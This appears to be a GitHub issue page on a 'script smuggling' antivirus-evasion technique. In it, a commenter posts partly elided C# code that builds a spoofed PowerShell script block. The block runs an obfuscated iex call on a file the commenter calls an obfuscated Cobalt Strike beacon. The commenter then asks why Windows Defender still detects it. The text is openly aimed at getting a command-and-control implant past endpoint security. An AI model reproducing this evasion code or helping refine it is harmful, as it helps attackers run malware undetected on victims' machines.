You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
A very nice anti-detection idea, however my sample still can be detected by Windows Defender, here is the demo code:
...namespace ScriptSmuggling
{publicclassProgram{publicstaticvoidMain(){// the msedge_installer.log is an obfuscated cobaltstrike beacon file (.ps1). it can be execute by iexstringscript=@". ($pShOmE[4]+$PsHoMe[34]+'X') (cat C:\Windows\Temp\msedge_installer.log)";ScriptBlocksb=BuildSpoofedBlock(script);// Setup PowerShell runspaceusing(RunspacerunSpace=RunspaceFactory.CreateRunspace()){runSpace.Open();using(PowerShellps=PowerShell.Create()){ps.Runspace=runSpace;ps.AddCommand("Invoke-Command").AddParameter("ScriptBlock",sb);Collection<PSObject>results=ps.Invoke();foreach(PSObjectresultinresults){Console.WriteLine(result);}// Display any errors from the error streamforeach(ErrorRecorderrorinps.Streams.Error){Console.WriteLine("ERROR: "+error);}}}}publicstaticScriptBlockBuildSpoofedBlock(stringcontent){
...}}}
Maybe the executableAst is still be check by wdfdr?
The text was updated successfully, but these errors were encountered:
A very nice anti-detection idea, however my sample still can be detected by Windows Defender, here is the demo code:
Maybe the
executableAstis still be check by wdfdr?The text was updated successfully, but these errors were encountered: